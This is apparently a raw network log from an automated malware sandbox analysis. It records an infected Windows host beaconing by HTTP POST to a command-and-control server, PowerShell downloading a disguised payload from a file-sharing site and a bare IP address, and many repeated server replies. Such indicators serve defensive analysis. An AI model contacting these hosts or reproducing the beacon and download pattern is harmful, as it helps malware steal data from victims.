                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_03174BB0 URLDownloadToFileW,1_2_03174BB0
                Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.243.136Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /33/LOGLK.txt HTTP/1.1Host: 192.3.243.136Connection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: 1017.filemail.com
                Source: unknownHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:10 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:16 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
